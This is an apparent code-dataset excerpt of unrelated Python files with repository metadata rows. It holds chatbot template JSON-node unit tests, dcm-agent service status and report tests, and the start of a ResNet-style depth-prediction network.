self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_data")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_data_property("data_json", '{"key_data": "value_data"}')
self.assertEqual('{"key_data": "value_data"}', conversation.data_property("data_json"))
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual("{}", conversation.data_property("data_json"))
def test_json_delete_typevar(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
question.set_property("var_json", '{"key_var": "value_var"}')
self.assertEqual('{"key_var": "value_var"}', question.property("var_json"))
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual("{}", question.property("var_json"))
def test_json_delete_child_dic(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json.key_data")
node._type = "data"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("elemrnt")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"elemrnt": "value_data"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_data": {}}', conversation.data_property("data_json"))
def test_json_delete_list_element(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_name")
node._index = TemplateWordNode("1")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_3"]}', conversation.property("name_json"))
def test_json_delete_dic_element(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_name")
node._index = TemplateWordNode("1")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_property("name_json", '{"key_name": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": {"dic_1": "val_1", "dic_3": "val_3"}}', conversation.property("name_json"))
def test_json_delete_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_name")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_2", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("-1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_2"]}', conversation.property("name_json"))
def test_json_delete_no_target(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_name")
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_json_delete_invalid_key(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
node._key = TemplateWordNode("key_x")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
node._key = TemplateWordNode("key_name.key_x")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
def test_json_delete_invalid_child_key(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json.child1")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("child2")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_property("name_json", '{"key_name": {"child1": "data"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": {"child1": "data"}}', conversation.property("name_json"))
def test_json_delete_invalid_index(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._function = TemplateWordNode("delete")
node._key = TemplateWordNode("key_name")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("x")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("5")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
node._index = TemplateWordNode("-5")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
# to XML
def test_to_xml_json_typename(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_1")
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><json name="name_json"><key>key_1</key></json></template>', xml_str)
def test_to_xml_json_typedata(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_1")
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><json data="data_json"><key>key_1</key></json></template>', xml_str)
def test_to_xml_json_typevar(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._key = TemplateWordNode("key_1")
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><json var="var_json"><key>key_1</key></json></template>', xml_str)
def test_to_xml_json_all_parameter(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
node._index = TemplateWordNode("0")
node._item = TemplateWordNode("key")
node._key = TemplateWordNode("key_1")
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><json var="var_json"><function>insert</function><index>0</index><item>key</item><key>key_1</key></json></template>', xml_str)
def test_to_xml_json_no_key(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json.key_1")
node._type = "var"
node._function = TemplateWordNode("delete")
node._index = TemplateWordNode("0")
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><json var="var_json.key_1"><function>delete</function><index>0</index></json></template>', xml_str)
# others
def test_json_get_key_in_name(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json.key_1")
node._type = "name"
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
conversation.set_property("name_json", '{"key_1": "value_name"}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("value_name", result)
def test_json_get_no_typename(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.brain.properties.add_property("default-get", "unknown")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_no_typedata(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.brain.properties.add_property("default-get", "unknown")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_no_typevar(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.brain.properties.add_property("default-get", "unknown")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_invlid_function(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("update")
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_json_invlid_insert(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._function = TemplateWordNode("insert")
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_json_invlid_type(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("other_json")
node._type = "other"
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_node_exception_handling(self):
root = TemplateNode()
node = MockTemplateJsonNode()
root.append(node)
with self.assertRaises(Exception):
root.resolve(self._client_context)
| 39.212953 | 161 | 0.660933 | 7,596 | 71,446 | 5.93931 | 0.029884 | 0.06295 | 0.107015 | 0.069356 | 0.953696 | 0.945606 | 0.942237 | 0.939023 | 0.927851 | 0.914286 | 0 | 0.007183 | 0.212748 | 71,446 | 1,821 | 162 | 39.234487 | 0.794919 | 0.015466 | 0 | 0.86351 | 0 | 0.006964 | 0.115701 | 0.005531 | 0 | 0 | 0 | 0 | 0.326602 | 1 | 0.056407 | false | 0 | 0.004875 | 0 | 0.062674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2b3c0b5c6f2818d122b09ce8ed7b722815b25d4b | 12,281 | py | Python | src/dcm/agent/tests/integration/test_service_exe.py | JPWKU/unix-agent | 8f1278fc8c2768a8d4d54af642a881bace43652f | [
"Apache-2.0"
] | null | null | null | src/dcm/agent/tests/integration/test_service_exe.py | JPWKU/unix-agent | 8f1278fc8c2768a8d4d54af642a881bace43652f | [
"Apache-2.0"
] | 22 | 2015-09-15T20:52:34.000Z | 2016-03-11T22:44:24.000Z | src/dcm/agent/tests/integration/test_service_exe.py | JPWKU/unix-agent | 8f1278fc8c2768a8d4d54af642a881bace43652f | [
"Apache-2.0"
] | 3 | 2015-09-11T20:21:33.000Z | 2016-09-30T08:30:19.000Z | #
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.log import warn
import getpass
import json
import os
import shutil
import tempfile
import unittest
import mock
import psutil
from dcm.agent import logger
import dcm.agent.cmd.service as dcmagent
import dcm.agent.cmd.configure as configure
import dcm.agent.tests.utils.general as test_utils
class TestProgramOptions(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.run_as_user = getpass.getuser()
test_utils.connect_to_debugger()
cls.test_base_path = tempfile.mkdtemp()
cls.test_conf_path = os.path.join(
cls.test_base_path, "etc", "agent.conf")
conf_args = ["-c", "Other",
"-u", "http://doesntmatter.org/ws",
"-p", cls.test_base_path,
"-t", os.path.join(cls.test_base_path, "tmp"),
"-C", "ws",
"-U", cls.run_as_user,
"-l", "/tmp/agent_status_test.log"]
rc = configure.main(conf_args)
if rc != 0:
raise Exception("We could not configure the test env")
@classmethod
def tearDownClass(cls):
logger.clear_dcm_logging()
shutil.rmtree(cls.test_base_path)
def tearDown(self):
if os.path.exists("/tmp/agent_info.tar.gz"):
os.remove("/tmp/agent_info.tar.gz")
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.utils.identify_platform')
def test_simple_status(self, id_platform, sql_obj):
id_platform.return_value = ("ubuntu", "14.04")
rc = dcmagent.main(args=["dcm-agent", "status"])
print(rc)
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.utils.identify_platform')
def test_simple_tar(self, id_platform):
id_platform.return_value = ("ubuntu", "14.04")
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "--report"])
self.assertEqual(rc, 0)
self.assertTrue(os.path.exists("/tmp/agent_info.tar.gz"))
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_effective_cloud_base_report(self,
id_platform,
guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "--report"])
self.assertEqual(rc, 0)
self.assertTrue(os.path.exists("/tmp/agent_info.tar.gz"))
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_real_pid_status(self, id_platform, guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
pid_file = os.path.join(self.test_base_path, "dcm-agent.pid")
with open(pid_file, "w") as fptr:
fptr.write(str(os.getpid()))
try:
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 0)
finally:
os.remove(pid_file)
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_bad_pid_status(self, id_platform, guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
pid_file = os.path.join(self.test_base_path, "dcm-agent.pid")
with open(pid_file, "w") as fptr:
fptr.write("notapid")
try:
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
finally:
os.remove(pid_file)
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_used_pid_status(self, id_platform, guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
pid_file = os.path.join(self.test_base_path, "dcm-agent.pid")
pid_val = None
pid_list = psutil.pids()
for i in range(10, 2 ^ 15):
if i not in pid_list:
pid_val = i
break
if pid_val is None:
warn("No free pid found... huh")
raise unittest.SkipTest("No free pid found")
with open(pid_file, "w") as fptr:
fptr.write(str(pid_val))
try:
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
finally:
os.remove(pid_file)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_exception_in_request_lookup(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return [FakeRequest({'nocommand': 'initialize'})]
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_not_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_rejected_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return []
def get_all_rejected(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_acked_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_nacked_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return [FakeRequest({'command': 'initialize'})]
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
| 35.804665 | 76 | 0.606628 | 1,476 | 12,281 | 4.789295 | 0.142276 | 0.054322 | 0.080634 | 0.097609 | 0.797567 | 0.793606 | 0.793606 | 0.786533 | 0.771962 | 0.764606 | 0 | 0.008315 | 0.275303 | 12,281 | 342 | 77 | 35.909357 | 0.785955 | 0.044866 | 0 | 0.753788 | 0 | 0 | 0.170494 | 0.108853 | 0 | 0 | 0 | 0 | 0.05303 | 1 | 0.193182 | false | 0.007576 | 0.049242 | 0.113636 | 0.405303 | 0.003788 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
99115bf10be27ac22462b4dba8c7127f84c67276 | 50,545 | py | Python | depth_network/depth_prediction_net.py | GeoffreyMClark/Depth_Estimation | 7868a5227d65e7469be2f334d94a0ba785665658 | [
"MIT"
] | null | null | null | depth_network/depth_prediction_net.py | GeoffreyMClark/Depth_Estimation | 7868a5227d65e7469be2f334d94a0ba785665658 | [
"MIT"
] | null | null | null | depth_network/depth_prediction_net.py | GeoffreyMClark/Depth_Estimation | 7868a5227d65e7469be2f334d94a0ba785665658 | [
"MIT"
] | null | null | null | import pandas as pd
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import matplotlib.pyplot as plt
import tensorflow as tf
import logging
tf.get_logger().setLevel(logging.ERROR)
import time
# import matplotlib.pyplot as plt
import cv2
import numpy as np
import pickle
from sklearn.model_selection import train_test_split
import math
from tensorflow.keras.initializers import glorot_uniform
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dropout, Flatten, Dense, Conv2D, MaxPooling2D, Input, Activation, Add
from tensorflow.keras.layers import Reshape, UpSampling2D, InputLayer, Lambda, ZeroPadding2D, AveragePooling2D
from tensorflow.keras.layers import Cropping2D, Conv2DTranspose, BatchNormalization, Concatenate
from tensorflow.keras.losses import binary_crossentropy
from tensorflow.keras import backend as K
from tensorflow.keras.losses import mse, binary_crossentropy
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.utils import plot_model
from tensorflow.keras.applications.resnet50 import ResNet50
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.resnet50 import preprocess_input, decode_predictions
from tensorflow.keras.applications import EfficientNetB0
class get_depth_net():
# @staticmethod
def identity_block(self, X, f, filters, stage, block):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value. We'll need this later to add back to the main path.
X_shortcut = X
# First component of main path
X = Conv2D(filters=F1, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2a', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2D(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2D(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def identity_block_transpose(self, X, f, filters, stage, block):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value. We'll need this later to add back to the main path.
X_shortcut = X
# First component of main path
X = Conv2DTranspose(filters=F1, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2a', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2DTranspose(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2DTranspose(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def convolutional_block(self, X, f, filters, stage, block, s=2):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
##### MAIN PATH #####
# First component of main path
X = Conv2D(F1, (1, 1), strides=(s, s), name=conv_name_base +
'2a', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2D(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2D(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
##### SHORTCUT PATH ####
X_shortcut = Conv2D(F3, (1, 1), strides=(s, s), name=conv_name_base +
'1', kernel_initializer=glorot_uniform(seed=0))(X_shortcut)
X_shortcut = BatchNormalization(
axis=3, name=bn_name_base + '1')(X_shortcut)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def convolutional_block_transpose(self, X, f, filters, stage, block, s=2):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
##### MAIN PATH #####
# First component of main path
X = Conv2DTranspose(F1, (1, 1), strides=(s, s), name=conv_name_base +
'2a', padding='valid', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2DTranspose(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2DTranspose(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
##### SHORTCUT PATH ####
X_shortcut = Conv2DTranspose(F3, (1, 1), strides=(s, s), name=conv_name_base +
'1', padding='valid', kernel_initializer=glorot_uniform(seed=0))(X_shortcut)
X_shortcut = BatchNormalization(
axis=3, name=bn_name_base + '1')(X_shortcut)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
